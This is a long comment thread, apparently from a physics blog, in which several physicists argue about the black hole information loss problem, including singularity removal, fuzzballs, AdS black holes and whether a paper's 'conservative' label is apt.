[2] In 2005, George Chapline gave a talk about black holes at Harvard. Here is what Jacques Distler had to say about that: http://golem.ph.utexas.edu/~distler/blog/archives/000530.html I urge everyone to read that, and to consider replacing the name "George Chapline" by "Samir Mathur". OK, I admit that the comparison is not completely fair. But nor is it completely *unfair*.... [c] The Horowitz-Maldacena proposal recognises the obvious fact that the singularity [or whatever replaces it] is the only sensible place to put whatever weird stuff is going on, yet it preserves unitarity in the "ordinary", stringy way.
It is "radical" in Bee+Lee's sense, but to my mind it is the most conservative solution of all. Thanks you for expanding the explanations of your work. Could you please elaborate on the folowing points: 1) what motivates the attitude towards maintaining unitarity through removing the singularity? While quantum physics is deeply linked to the concept of unitary evolution, non-equilibrium dynamics and non-equilibrium field theories are manifestly built on a non-unitary foundation. Why should one insist that equilibrium physics remains valid in strongly coupled gravitational regimes? 2) according to one of your earlier replies to my questions, astrophysical observations alone cannot settle the issue of where the BH entropy is coming from. Then how can one resolve the information paradox without having verifiable claims on the nature of BH entropy? 3) You conclude: "The sane thing to do is to stick with conservative options until we are sure it's a no-go. That requires in particular understanding the properties of Planck-sized quantum gravitational objects with high entropy." How can one ever hope to understand the physics of such "quantum gravitational objects" at the unreachable Planck scale? Isn'it wishful thinking? I am perfectly sure I never doubted, neither here nor anywhere else, that the curvature at the black hole horizon is small compared to the Planck scale for large black holes (ie with masses larger than the Planck mass). I have no clue what you are trying to say. Individual microstates don't respect the causality, the "empty interior" picture of the black hole is not appropriate for them [...] It is very easy to see that many microstates of a black hole don't have an empty interior. I don't know who or what you are arguing with, but I never said anything of the sort that the black hole interior is empty or whatever it is you are trying to say. I also don't know what it means for a microstate not to respect causality, what exactly do you mean with that? On the other hand, having a spaceship in a black hole is a nontrivial condition that chooses non-generic black hole microstates. The generic states can't have any spaceships and they look contrived. For example, the "fuzzballs" (including LMN bubbles in AdS) give very nontrivial profiles for black hole microstates. All these subtleties go away with the averaging which must clearly generate translation invariant physics, even locally, because the whole "ensemble" of microstates is clearly invariant under these things, and the empty BH interior is the only dynamics one can get in this way. Ah. And exactly how is this compatible with your above, correct, observation that what has crossed the horizon stays inside, and moreover can't even stay close by the horizon? I'm asking for a local dynamical explanation for what happens to the information. As far as I know fuzzballs create significant distortions of locality at horizon scales. Again, if the Hawking radiation carries no information about the initial state, and the information is stored in some other Universe, then the definitions of the information loss problem say that the information has been lost. More precisely, it has been lost for the physical observer. Correct, it has been lost for the physical observer in the asymptotically flat region. The point is however that the evolution remains unitary if you take into acount the full endstate, which includes the disconnected part. 
I personally don't think that's such a particularly compelling scenario, but it's certainly a possibility. That's also why the information loss problem wasn't a problem before Hawking discovered the radiation: one could always say that the information was inside. The problem only became physical once the black hole could disappear because one could no longer argue that the information is in it. There are examples of three dimensional black holes (in AdS3 space) which have no curvature singularity whatsoever (these objects have an event horizon) and yet the paradox exists. Therefore, the story is not related to what Bee is trying to say, and all the attempts to associate the physics with the singularity cannot hold water. Your argument is a non-starter. A) I was explicitly not referring to curvature singularities, but more importantly B) I wasn't saying if you don't have a singularity, you don't have a problem. I said as long as you have a singularity, you certainly have a problem. If you want to provide a counterexample, you'd have to find a case with singularity but without paradox, and not a case without singularity but with paradox. Just another off the wall thought (or more likely a stupid question) and that is: if, as in quantum physics, all that should be considered as being information is the wave function, then everything that follows is simply what manifests as a result: in other words what evolves. So the space required to hold a single wave function would not be very great, although necessarily less than zero (a point). The question then is to ask if this evolution is deterministic or not. Standard quantum theory insists that it's not, thus what is referred to as information is then arbitrary (and therefore trivial), while if it is considered as deterministic it then is significant (yet not fundamental in itself). It is then of course further required to discover if the wave function is fundamental in its beginnings and description or itself arbitrary. I find it strange then that when physics searches for a TOE in attempting to simplify, while insisting that nature itself is denied the same, as it's required to preserve every insignificant aspect. Is this then to be considered reductionism or redundantism? ;-) Pope: nobody is claiming that dS and AdS are in any way similar. The large black holes in AdS are actually very different from those in flat space, in that they are eternal. The point is that in that context one can make precisely the same arguments that Hawking makes for information loss, and see that they fail, and precisely how. Yes, it is a logical possibility that those arguments somehow fail in AdS (with arbitrarily low cosmological constant) but are still valid in flat space or dS space. It is a matter of personal taste if you regard such an attitude as keeping your head in the sand, or being conservative and cautious. One feature of the information paradox in the eternal context is that the singularity is always spacelike separated from an external observer. So, without macroscopic violations of causality you can do whatever you like at the singularity; it will have precisely zero effect on the information paradox. In flat space there is a small possibility the singularity becomes relevant at late times; this possibility is eliminated in the eternal case. They study the CGHS model and show in detail that the singularities in black holes are eliminated by quantum effects and the evolution is completely unitary.
This is a PRL; more details are coming in a long paper, some of which were discussed in a recent talk: http://pirsa.org/08120016/. There has also been a lot of progress showing that the singularity is eliminated in homogeneous models of black hole interiors. See, for example, papers by Leonardo Modesto. There are other papers in this domain, for example, Ashtekar and Bojowald, which we cite. I might mention also that the literature on elimination of cosmological singularities in homogeneous models is now very large; for a recent review see Parampreet Singh, Are loop quantum cosmos never singular?, arXiv:0901.2750. My view is that these papers together greatly strengthen the case for a conservative resolution. As we argue, IF the singularities are eliminated, THEN unitarity is likely a consequence. One then has just to use that unitary evolution to see what the dynamics predicts about the final state. It may in fact be the case that all the information gets to infinity; to find out, one has to solve the unitary evolution. Discussions about ways to resolve the paradox without singularity removal are then very possibly non sequiturs, because if the singularity is eliminated the problem is solved. Thanks Lee, it is probably most efficient to continue the private discussion. Just wanted to mention here for the sake of clarity that what we refer to as the information puzzle is a little different. For me this is the question of whether or not all the initial information is accessible to an observer staying outside the horizon at all times. I take it that you are asking whether the information is preserved "somewhere", which is a very different question. So for example, if there are baby universes carrying all the information, the answer to the first question is no, and to the second one is yes. So, for me this scenario translates to information loss, and for you it doesn't. The Horowitz and Maldacena option is not radical in the sense defined in the paper. Their modification is constrained to the region where one can expect quantum gravitational effects to be strong; that's conservative. I find the motivation for imprinting the information in a boundary condition at the singularity weak, but that's a different point. I could indeed come to like that option if it didn't seem so ad hoc to me. Best, I assure you that you have asked the simple question that you don't remember having asked, and it is very trivial for everyone to check this fact. Search this web page for: "But to one of your issues, how can anything happen at the horizon even if the curvatures are arbitrarily low. This is also well understood. In any quantum mechanical system with large degeneracies (as is typical for highly excited states), the following holds..." That's what Moshe wrote. And you asked: "Why do I have highly excited states if the curvature is arbitrarily low?" Sabine: I don't know who or what you are arguing with, but I never said anything of the sort that the black hole interior is empty or whatever it is you are trying to say. I was not trying to argue with you in any way. I was answering your question why the information could get out of the black hole. And I was answering it because I was hoping that you would have actually paid some attention to the answer to this important question rather than being disinterested in (or even annoyed by) all the key concepts behind the answer.
Again, the answer is that at the level of microstates, the causal diagram derived from an empty classical black hole is not applicable, which means that one cannot prove that no information can escape. That's what I mean by saying that microstates don't respect the causal rules of a simple classical black hole solution. Sabine: Ah. And exactly how is this compatible with your above, correct, observation that what has crossed the horizon stays inside, and moreover can't even stay close by the horizon? I'm asking for a local dynamical explanation for what happens to the information. As far as I know fuzzballs create significant distortions of locality at horizon scales. It is perfectly compatible. States with one spaceship - and the rest of the BH interior being (almost) empty - are much closer to the completely averaged black hole mixed states than a generic fuzzball solution, and the classical geometry around the spaceship becomes almost exactly applicable. When we already know that vast regions of the interior are almost flat, it guarantees that we must have already taken the average over very (exponentially) many microstates. On the other hand, the geometry of the BH interior is never exact for a subset of states (or even one pure microstate), and it is never exactly true that the information cannot get from the spaceship to the outside of the black hole - small effects can do it. It's a normal thing for this information to do whatever it wants to do: on the contrary, the ability to hold the information isolated inside is an "emergent phenomenon" obtained by averaging over sufficiently many eigenstates so that the effective geometry (almost) mimics the classical black hole and all objects have to respect the causal rules of this classical black hole. Again, individual microstates don't look like this, and they don't respect this causal diagram. Correct, it has been lost for the physical observer in the asymptotically flat region. The point is however that the evolution remains unitary if you take into account the full end state, which includes the disconnected part. I personally don't think that's such a particularly compelling scenario, but it's certainly a possibility. The problem with this statement about the preservation of the information in other universes is not that it is not compelling. The problem is that it is physically meaningless. For whatever non-unitary evolution, one could always argue that the information is preserved in another Universe or in God's memory, or whatever. In all these metaphysical and religious scenarios, the information is lost from the viewpoint of physics. It may be preserved from the viewpoint of metaphysics but I was talking about physics which measures the information, by the definition of physics, in the experimentally accessible universe only. Sabine (to orbifold): Your argument is a non-starter. A) I was explicitly not referring to curvature singularities, but more importantly B) I wasn't saying if you don't have a singularity, you don't have a problem. Of course you were. Open your paper on page 3. You write: "But we do note that there is recent work that does show that, in a particular model of quantum gravity, black hole singularities are removed in a way that leads to the restoration of unitary evolution. This result has been derived in a study of the CGHS [9] model by Ashtekar et al in [10]. They find results that confirm earlier arguments in [12]. Part of the motivation of this paper is to put their results in a broader context."
Maybe you should read your paper before you discuss it on the blog. Sabine: If you want to provide a counterexample, you'd have to find a case with singularity but without paradox, and not a case without singularity but with paradox. This counterexample has been mentioned about five times on this page already, too. I am talking about Maldacena 2001, the eternal AdS black holes. Figure 1 shows that he is talking about a spacetime with spacelike singularities. By constructing a dual boundary description with two boundaries, he is able to explicitly show that the information is fully preserved. One can say that the singularities are "resolved" but the resolution is not a new geometry which draws something completely different than singularities at the beginning or the end. The resolution is the AdS/CFT boundary dual which actually allows one to calculate what's happening in the spacetime, including the arbitrary vicinity of the two singularities. Indeed, everybody can check this comment section to find out what I said. I have no time and no interest in playing silly games like this. That's what I mean by saying that microstates don't respect the causal rules of a simple classical black hole solution. Thanks, fine. Now what is your problem? You have a solution approach, according to our terminology it is "radical", you can decide for yourself whether you find that flattering or insulting. On the other hand, the geometry of the BH interior is never exact for a subset of states (or even one pure microstate), and it is never exactly true that the information cannot get from the spaceship to the outside of the black hole - small effects can do it. Does the fuzzball have an event horizon at all? I think it is pointless to argue about what the interesting aspect of the information loss problem is, clearly your interests are elsewhere than mine. It seems to me btw this is the same point as Moshe and Lee have been discussing; see above comments for clarification. I wasn't saying if you don't have a singularity, you don't have a problem. Of course you were. Open your paper on page 3. You write: "But we do note that there is recent work that does show that, in a particular model of quantum gravity, black hole singularities are removed in a way that leads to the restoration of unitary evolution. This result has been derived in a study of the CGHS [9] model by Ashtekar et al in [10]. They find results that confirm earlier arguments in [12]. Part of the motivation of this paper is to put their results in a broader context." Maybe you should read your paper before you discuss it on the blog. Maybe you should try to understand what I was saying before commenting on it? The paragraph you quote says very clearly: There is a model XYZ in which the singularity is removed due to quantum gravitational effects and the resulting evolution is unitary. This is very different from saying whenever you get rid of the singularity, you have solved the problem. This counterexample has been mentioned about five times on this page already, too. I am talking about Maldacena 2001, the eternal AdS black holes. Figure 1 shows that he is talking about a spacetime with spacelike singularities. I'm not interested in eternal black holes, and even less interested in eternal black holes in AdS space. I am interested in describing nature. We have stated in the paper which black hole spacetimes we are considering.
Best, I can therefore only imagine how this must be for you and others who have this as their profession when picking up to read such a book. Well, as you can imagine I usually skip the first few chapters. How many introductions to special relativity does one really need to read in one's lifetime? I therefore very much appreciate it if the author makes sure the reader doesn't miss anything by skipping these parts and states in the preface (as one often finds) that if you know A, B, C you can skip chapters 2, 3, 4, etc. Yes, the measurement process in quantum mechanics itself is non-deterministic and non-unitary. The problem with the black hole evolution however occurs already before that. One can then discuss however how much non-unitarity is really worrisome to begin with. There are certainly people who have considered the option of just accepting non-unitarity. It is however argued (quite convincingly it seems to me) that this generically leads to non-negligible violations of energy conservation. I have the impression however the issue isn't yet completely settled. Best, I didn't ask why the object that is supposed to describe a fermion is stable or static; I was asking why it has a specific discrete mass spectrum that happens to coincide with the masses of fermions we have measured. You need a non-vanishing trace of the energy momentum tensor because otherwise the object doesn't describe a massive fermion. Best, In that case, I don't understand why you're playing these games in such a shortage of time. You asked a question to Moshe, he answered it, you asked it again, and I answered it again, using different words. Then you denied that you had ever asked the question. What's the point here? In science, we are used to asking questions because we are actually interested in the answers. Sabine: Thanks, fine. Now what is your problem? You have a solution approach, according to our terminology it is "radical", you can decide for yourself whether you find that flattering or insulting. I or we no longer have any major problem because the problem has been solved at the qualitative level, to say the least. The solution I sketched is not mine; it is the summary of one of the most important results of the theoretical physics community in the last 10 years. Whether you use one adjective or another - a more sensible one or, in your case, a less sensible one - has clearly no impact on the status of the solution to the information loss paradox. Sabine: Does the fuzzball have an event horizon at all? No, fuzzballs don't have any event horizons. Do you hear this statement for the first time? Event horizons are approximate notions obtained by averaging over all (or a huge number) of microstates. A particular pure microstate has a vanishing entropy, which translates into a vanishing area of event horizons. Sabine: I think it is pointless to argue about what the interesting aspect of the information loss problem is, clearly your interests are elsewhere than mine. I don't think that the basic discussion about similar important problems in physics is about interesting vs uninteresting questions. It is about correct vs incorrect answers. Sabine: There is a model XYZ in which the singularity is removed due to quantum gravitational effects and the resulting evolution is unitary. This is very different from saying whenever you get rid of the singularity, you have solved the problem.
The problem is that there is no model in which the removal of the singularity can solve the information loss problem because this problem has nothing whatsoever to do with the singularity. Now you're just trying to marginalize this whole point into "just one model" but you wrote very clearly that the motivation for writing your paper was exactly the result of this "model" that you wanted to put into a broader perspective. At any rate, these issues about stronger and weaker language are not too important because all your statements, both the weak and the strong ones, are completely incorrect. Sabine: I'm not interested in eternal black holes, and even less interested in eternal black holes in AdS space. I am interested in describing nature. We have stated in the paper which black hole spacetimes we are considering. You were seemingly interested in them a few minutes ago because you were asking orbifold bh for a counterexample to one of your statements. At any rate, your implicit idea that the qualitative character of the solution to the information loss problems is very different for Maldacena's eternal black holes and for other black holes in quantum gravity is completely wrong, too. I could have used non-eternal black holes, too, including Schwarzschild in ordinary AdS - with the disadvantage that the singularity is further from the boundary in that case. But I guess that you're not interested in this statement about the universality and rigidity of these results, either, so I profoundly apologize for having bothered you with physics. Sure, I think we all understand that you are saying string theory has solved the problem, thanks for the clarification. No, fuzzballs don't have any event horizons. Do you hear this statement for the first time? I just wanted to make sure we're on the same page, since you said earlier the only option you consider viable is option (1). Just that this option has an event horizon. Funny, isn't it? What it amounts to is that you need a distortion of that causal structure (call it 'microscopical' or whatever) that allows information to not be confined to that region. I understand you are saying fuzzballs provide such a scenario. I never questioned that. I'm not interested in eternal black holes, and even less interested in eternal black holes in AdS space. I am interested in describing nature. We have stated in the paper which black hole spacetimes we are considering. You were seemingly interested in them a few minutes ago because you were asking orbifold bh for a counterexample to one of your statements. My apologies. I guess I should have noticed by now that you are either unwilling or indeed unable to fill in details of a sentence that I consider obvious. In this case I was obviously talking about a counterexample to the statement that is in the paper. your implicit idea that the qualitative character of the solution to the information loss problems is very different for Maldacena's eternal black holes and for other black holes in quantum gravity is completely wrong, too. I could have used non-eternal black holes, too, including Schwarzschild in ordinary AdS [...] I profoundly apologize for having bothered you with physics.
If you are interested in physics, then why don't you point me to a string-theoretical study of the formation of a black hole from, e.g., pressure-free collapsing dust (preferably in a spacetime that actually describes our universe) and subsequent evaporation of that black hole which does indeed have a quantum singularity but no information loss and thus provides the counterexample you were just claiming exists? Sabine: I just wanted to make sure we're on the same page, since you said earlier the only option you consider viable is option (1). Just that this option has an event horizon. Funny, isn't it? No, it's not funny at all. The figure (1) is the correct macroscopic description of the fate of a Schwarzschild black hole spacetime. However, the macroscopic picture (1) itself doesn't contain all the tools to explain what happens with the information. To do so, one must actually look at individual microstates, and pure generic microstates don't look like (1) and don't have any event horizon. As has been written about 10 times (by Moshe and others) already, (1) is the "thermodynamic" limit of averaging over (almost) all of these microstates. I will happily write this answer for the 12th time, too, but one may be slowly approaching a reasonable limit. Sabine: My apologies. I guess I should have noticed by now that you are either unwilling or indeed unable to fill in details of a sentence that I consider obvious. In this case I was obviously talking about a counterexample to the statement that is in the paper. I have given you counterexamples to the particular assertion in your paper but you wrote you were not interested in them. And in fact, you still seem to be completely uninterested in any counterexamples or any other physical topics relevant for the quantum physics of black holes. Sabine: If you are interested in physics, then why don't you point me to a string-theoretical study of the formation of a black hole from, e.g., pressure-free collapsing dust (preferably in a spacetime that actually describes our universe) and subsequent evaporation of that black hole which does indeed have a quantum singularity but no information loss and thus provides the counterexample you were just claiming exists? Well, the reason is very simple. Because, as every physicist worth the name understands, whether a black hole is born from a collapsing cloud of dust or from adding worthless manuscripts into a near-critically heavy neutron star has absolutely no impact on the qualitative physics of the black holes. The resulting black holes clearly have the same properties (by all the no-hair theorems, thermalization, etc.) and the same way to encode the information. String theorists are not writing special papers about the information loss of black holes created out of dust because such papers would be intellectually deficient combinations of two problems that have clearly nothing to do with each other and no author with a difficulty to see this simple point could ever learn string theory and write papers about it. But once again, everyone, including non-string theorists, is free to write papers about anything she finds fit or conservative. He or she doesn't have to be affected by any standards that are natural elsewhere. I will happily write this answer for the 12th time, too, but one may be slowly approaching a reasonable limit. You can save yourself a lot of time if you would not try to "answer" questions I didn't ask.
I understand that the microstates you are considering are not bothered by the classical causality and that this effect happens on horizon scales. This is a scenario that according to our classification is "radical". I don't know what more there is to say. Your notion of what is "physical," "natural," or "interesting" clearly does not match with mine, but then I already knew that. The information content of your comments has approached zero. I have made my points clear, you are fuzzing around, probably upset - as usual - that I am not advocating string theory. It's an entirely useless back and forth; I herewith consider this exchange finished. Come on, Sabine. If I understand well, Moshe and Lubos were just explaining to us why the 'radical' solution is in fact 'conservative' and nearly established. I am just a chemical physicist but there seems to be nothing strange about objects of a high entropy that have some internal structure that stretches across the full volume that these objects occupy in space. What is important in GTR is whether in realistic situations with ordinary matter, one will contradict equations of GTR in circumstances where it should apply. And they say 'No', they will hold after the averaging, much like if we calculate the index of refraction of a gas (which otherwise behaves as smoothly as the vacuum) by averaging over the effect of all the complicated and chaotic atoms in this gas. I don't actually know whether they can prove or show that GTR emerges by averaging over their complicated microstates but I guess they have some reasons to say so. Respectfully, I would disagree that there is anything 'radical' about an internal structure of bound states of a high entropy. Indeed it has become clear to me that our notion of "conservative" is not shared by other people. I can't say this came very unexpectedly. I just honestly don't know what good it is to argue over the use of words. there seems to be nothing strange about objects of a high entropy that have some internal structure that stretches across the full volume that these objects occupy in space. No, of course not. Except that the 'stretching' to fill that volume isn't in agreement with the classical causal structure of these objects, and that doesn't explain how microscopically the information is transferred from the matter that collapsed to the outgoing radiation. Best, "Indeed it has become clear to me that our notion of "conservative" is not shared by other people." Yes, from my admittedly unqualified perspective the fuss seems to focus around the choice of words, so perhaps you should consider subtitling your paper to better express one choice of meaning assigned to "conservative" found in Webster's, which says it is "marked by moderation or caution"; as a subtitle this could read: "Solutions for the Black Hole information problem narrowed to those less likely to achieve throwing the baby out with the bath water." Then again perhaps that's too long a subtitle and therein requires further consideration :-) It is really interesting that here - as in several previous instances - when Lubos runs out of arguments we get some anonymous or pseudoanonymous comments that echo what he couldn't convince anybody of believing. 1. How come that neither you nor Lubos are able to tell anybody which statement of mine allegedly contradicted which statement? 2. This merely expresses your disliking of our choice of words. There is nothing to "get" here. 3.
I indeed disagree with my co-author on the relevance of these results and he knows that. It seems very clear to me the problem with your paper vis-à-vis Lubos. You have used the term 'Conservative' when in fact you tend more towards the blue side of things, aka 'Liberal'. As Lubos is without a doubt 'Conservative' it would appear he is upset you have tried to steal or otherwise co-opt his identity. Just trying to lighten things up a bit! I'll take a gander at your paper tomorrow but suspect it is above my pay grade. Re: "It is really interesting that here - as in several previous instances - when Lubos runs out of arguments we get some anonymous or pseudoanonymous comments that echo what he couldn't convince anybody of believing." Sabine, I've just read your next post (huge fan!) and you are not only a notorious pessimist but an equally notorious paranoid. Peter Shor, the point is precisely that the black hole should be thought of as a generic highly excited state of a unitary chaotic system. Those states are very dense, almost degenerate. To distinguish one of those states from the others you have to measure S bits of information. If the information on the initial pure state is all encoded in the Hawking radiation, you have to measure S bits of information encoded in that radiation to decide which state you started with. You could for example measure one simple quantity (like the total energy) to S decimal places. By the uncertainty relation that will take a very long time (a rough version of this estimate is sketched below). Or you can measure the time sequence, e.g. the same quantity at S different times. Or anything else really, as long as you gain S bits of information. The point is that for any of those measurements you will need more than semi-classical gravity has to offer. The fact that you cannot distinguish the black hole states from each other, or from a thermal state, using order one bits of information (measuring simple quantities, whose complexity does not scale with the entropy, to a fixed accuracy, which also does not scale with the entropy) should not be surprising. Dear Spinfoam, the coarse-graining (summing over many microstates) leads to the gravitational description, see e.g. a paper by Alday, de Boer et al. I don't think that they're extremely universal and show everything we want to know but they're surely a "proof of concept". It may sound remarkable that by summing over many/all chaotic microstates, one gets such a simple description. On the other hand, that's what has to happen in any thermodynamic limit - which simplifies things. Sabine: if you disagree (as you just wrote) with Lee Smolin who says that the Ashtekar et al. models to "solve the loss by removing the singularity" are important, you shouldn't have agreed to become a co-author of a paper whose main purpose is to promote these results and put them into a broader perspective, as the paper itself claims. Your discussion with Anonymous whether she or he's me is, well, amusing, but I understand that you probably can't settle it by an experiment so you have to rely on your natural beliefs. Otherwise, Lee Smolin's unfortunate choice of words ("conservative") was clearly deliberate and meant to introduce bias - to present a fringe, unlikely approach as a sensible and serious one (at least for those who can be fooled by adjectives). I think that physicists should stick to evidence and allow others to think which solution is conservative, especially if they know that the justification for their adjectives will inevitably be misunderstood by the readers.
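To put the counting in Moshe's reply to Peter Shor above into rough formulas - an illustrative estimate only, with order-one factors and the reference energy scale chosen for convenience, not anything stated verbatim in the thread: a black hole of entropy S has of order

N ~ e^S

nearly degenerate microstates, so identifying one of them means acquiring about log_2(e^S) ≈ S/ln 2, i.e. of order S, bits of information. The corresponding spacing between energy levels is of order

Delta E ~ T e^(-S),

with T the Hawking temperature, so resolving a single simple quantity like the total energy "to S decimal places" costs, by the time-energy uncertainty relation,

t ≳ hbar / Delta E ~ (hbar/T) e^S,

an exponentially long time for a macroscopic hole. A semiclassical calculation, which only ever keeps a handful of such bits, is then guaranteed to return an answer that looks thermal.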
Sabine, I've just read your next post (huge fan!) and you are not only a notorious pessimist but an equally notorious paranoid. I should add that this combo is actually not that uncommon! Thanks, I am glad you like the new post, for you will probably see it on the front page for the rest of the week, I am presently somewhat stressed out. The comment you are referring to was actually a rare expression of optimism. I was thinking there can't possibly be two different people in the world that are unable to extract meaning from simply phrased conversations. Now see where that optimism got me. I agree on everything that is stated in the paper. Having a co-author does luckily not require to agree with that person neither on the motivation for writing the paper nor on the opinion about every single reference cited. 1) As I believe I also said to somebody else above, you can try to live with non-unitary evolution if you really want. There are certainly people who have investigated this possibility. Generically, non-unitary evolution (from the initial to the final state) however goes along with violations of energy conservation. I think the issue of how large these violations have to be and whether that could be acceptable is not completely settled. However, that is a solution attempt we have not considered in the paper. The point is not that there couldn't be something funny going on in the quantum gravitational region, the point is that this fun wouldn't neatly stay there but affect the evolution from one asymptotically flat region to another. 2) I don't think I ever said something about the question 'where the black hole entropy is coming from', I am not even sure what that means. But yes, for all we currently know, there is no way we will be able to measure Hawking radiation any time soon (except possibly if the LHC does indeed create micro black holes). 3) I think it is doable with some more effort at least to construct models that can fill in this spot without causing any disastrous problems, and I am confident these will increase our understanding about what is going on under such extreme conditions. I don't know of any way in which this could be experimentally testable. That doesn't mean however nobody will ever be able to find a way. Thanks for your reply, amidst all this heated exchange of opinions!... Regarding the Planck scale, it is possible that astrophysical data from gamma ray bursts and Dark Matter detectors will provide some clues in the long run. But this is far from being a sure thing. I also hope (like everyone else) that the LHC will help us understand what is going on in the TeV sector and (maybe) give us further hints on what's happening above this scale! In any event, congratulations to you and Lee for a well-written report! Maybe someone in this thread could give me an argument why causally separated baby universe creation is a possibility that isn't automatically excluded by observation. I realize that from the point of view of an observer in the flat space, he/she will still have an information loss problem. He will rightly conclude that information is lost in his universe and that physics in his local patch is nonunitary and it's only in the full picture with all the baby universes taken into account that unitarity is restored. Now shouldn't this imply drastic violations of energy conservation? From the point of view of the global evolution of the universe each time you create a black hole, it acts like an energy sink. 
Wouldn't this completely alter the basic models of large scale structure formation? In fact you could imagine that it would change the FRW solutions by adding time dependant fields. You could go from a k = 0 universe to a k = -1 universe almost instantly! =/ Well, for one how many black holes do you think have completely evaporated during the history of our universe? Though it is hard to say with certainty, my (very conservative) estimate would be none. One can speculate about primordial black holes if you really want to. However, more important than that, I think you have a confusion about the scenario we were considering: shouldn't this imply drastic violations of energy conservation? From the point of view of the global evolution of the universe each time you create a blackhole, it acts like an energy sink. When you create the black hole, it can carry a lot of energy indeed. Then it evaporates. And evaporates. And evaporates. Maybe some hundred billion years or so, depending on its initial mass. In the case with the baby universe, it just keeps on evaporating until the mass as measured by an observer at infinity vanishes. Then the interior disconnects. There is no loss of energy in the parent universe. Best, B. ___ @ All Anonymouses: Would you please be so kind to either use a pseudonym (chose option Name/URL, you don't have to enter an URL) or at least enumerate yourselves? It would make my life much easier. Thanks. Sabine: I agree on everything that is stated in the paper. Having a co-author does luckily not require to agree with that person neither on the motivation for writing the paper nor on the opinion about every single reference cited. what you write here is internally inconsistent. If you disagree with the motivation to write the paper - to promote Ashtekar et al. results and put them into a broader perspective - then you cannot possibly agree with "everything that is stated in the paper" because this motivation is explicitly stated in the first paragraph of page 3 of your paper. And by the way, the rest of the paper is about the very same thing - that the Ashtekar "conservative" nuking of the black hole diagram - is a great idea (almost as great and as conservative as storing information in baby universes and remnants). So you must still make your mind whether you agree with your paper or whether you think that the Ashtekar model is not an important insight showing how the black holes behave. Or, maybe, you don't have to make up your mind because none probably expects a coherent viewpoint on black holes, anyway. In the paper we write "we do note that there is recent work that does show that, in a particular model of quantum gravity, black hole singularities are removed in a way that leads to the restoration of unitary evolution" followed by the reference Lee mentioned above, and later "Part of the motivation of this paper is to put their results in a broader context." That broader context being not constraining to a particular model. What is your problem with that? That we have cited a paper by somebody you don't like? Gosh, Lubos, don't you have better things to do than telling other people what they should cite, how and when and whether you like the words they are using or not? Exactly what is allegedly "inconsistent" about anything I wrote? Ashtekar's paper is interesting and a contribution to the discussion that certainly deserves to be cited in the context of our paper. 
However, as far as I am concerned it is a 1+1 dimensional toy model that he likes - as he said in his talk at PI, check the recording if you want - because one can use it to lead students in one lecture through a calculation explaining what black hole information loss is all about. Then they quantize that model and find the singularity is resolved and unitary evolution restored. That is great. Just that it isn't clear to me how much that tells us about the evolution of real black holes, and that is what I am ultimately interested in. I would also like to know better when the information comes out. This is not in the present publication but is supposed to be in an upcoming one as I hear. So I guess we will have to wait for that paper in preparation. I hope that clarifies it. I would appreciate it if you would stop trying to construct "disagreements" or "inconsistencies" that are not there. 1) It is possible that information is restored by the complete evaporation of the black hole as it reaches Planckian size. However, assuming that the information has not already come out in the Hawking radiation, it is obvious that this Planckian black hole will have to decay extremely slowly, since it has to release a huge amount of information using only a little energy. This behavior seems rather surprising(!) Does Ashtekar's model give this? If not, there's no way his story can be self-consistent. If it does that might convert this skeptic. 2) Contrary to popular belief, creation of baby universes does not necessarily lead to loss of information. This was heavily discussed in relation to wormholes twenty or so years ago, and was applied to black hole evaporation by Polchinski and Strominger. 3) I don't think it's accurate to say that little attention has been given to the "conservative" scenario in which the singularity is resolved and hence unitarity is restored. One finds much discussion of this in the papers from the mid 90s by Page, Polchinski, ... But either the info comes out before the BH reaches the Planck scale (which requires spooky nonlocal effects), or the Planckian hole must have an extremely long lifetime, as noted in (1). What's missing is a direct and concrete calculation showing either of these possibilities. Hi Bee: It seems that this discussion presupposes that a BH is formed. Is it possible that there are actually no BHs per this paper, arXiv:0712.1130, "Fate of gravitational collapse in semiclassical gravity"? I always felt that unless one can define exactly how matter behaves under the extreme conditions that might cause a BH, then a BH is pure speculation. Data that supposedly supports BH existence could also be explained by some exotic state of matter that we currently know nothing about. BHs are not defined just by a high density but by the event horizon. No BH, no event horizon, no paradox. 1) you would have to specify what assumptions you're making about the information/energy ratio. There's a much more natural, robust, and well-established bound constraining these things, the holographic bound, that implies that these small regions of space can't contain that much information. It follows, among other things, that remnants and baby universes are simply impossible, in agreement with microscopic analyses of the spectrum in all specific descriptions of quantum gravity we know as of today. 2) the 20-year-old wormhole picture that you seem to refer to is due to Hawking; and Coleman. 
Hawking himself denounced it in Virtual Black Holes 1995, primarily because it destroys the nice BH thermodynamical relations. Hawking surely doesn't believe the picture today, and already the 1995 paper also dismisses the Polchinski-Strominger variation of the picture. The Polchinski-Strominger variation is similar and almost certainly not believed to be plausible by any major player who was writing these papers 15 years ago. The progress simply went elsewhere and the relevance of the papers for physics gradually evaporated. Coleman's general idea remains something that physicists keep in mind but the newer progress has eliminated all of its relevance for the information loss paradox. Such a radical thing is simply not needed today because contradictions that were once thought to be inevitable were shown to be absent in the consistent theory that is known to exist. 3) You would need a full new consistent theory of quantum gravity that would qualitatively disagree with string theory to achieve your goal at your desired accuracy. It is just extremely unlikely to get. Sabine: if there are three opinions about Ashtekar's paper(s) 1) it should be ignored and one should continue to freely say, like I and you (somewhere), that the removal of singularities is not sufficient to solve the information loss paradox 2) is an OK contribution to a discussion and good enough to be cited and mentioned 3) is important enough to serve as a part of motivation of writing another paper by other authors who want to put the paper into broader context, I apologize but any two of the options above are inconsistent with one another. Now you invented 2) to interpolate between 1) and 3) but for me, 2) itself is still inconsistent both with 1) and 3) while 1) and 3) remain as inconsistent as before. If you don't see this inconsistency, it is not too surprising that you can find dozens or infinitely many consistent enough and "conservative" theories of quantum gravity, among other cool things. Lubos: I honestly don't think it is your business to tell me which papers I am allowed to cite in the introductions of my papers. Since you asked so nicely, I have offered my opinion about Ashtekar's paper above. You can take that as option 4) and check the box. If you read through what I wrote here and in the paper you will find that there is nothing "inconsistent" about it. Best, I always felt that unless one can define exactly how matter behaves under the extreme conditions that might cause a BH, then a BH is pure speculation. You don't need any extreme conditions to form a black hole. The formation of a black hole horizon can take place at arbitrarily low average density. I think I must have written this two dozen times on this blog, but I will repeat it once again because it is a very common misunderstanding: The formation of a black hole horizon can take place at arbitrarily low density, and thus arbitrarily low background curvature. The relevant question is whether a total mass M is inside a region smaller than its own Schwarzschild radius R_H ~ 2M. The density in that region goes with M/R_H^3 ~ 1/M^2 and thus drops with larger total mass. For a large mass, the density is very small, it is far from being extreme in any sense. The formation of a trapped surface is thus a very generic expectation of GR. You need radical measures to avoid it, not to get it. That btw is the reason why I don't find fuzzballs particularly plausible. Best, Regarding 1: Indeed, that is exactly the point 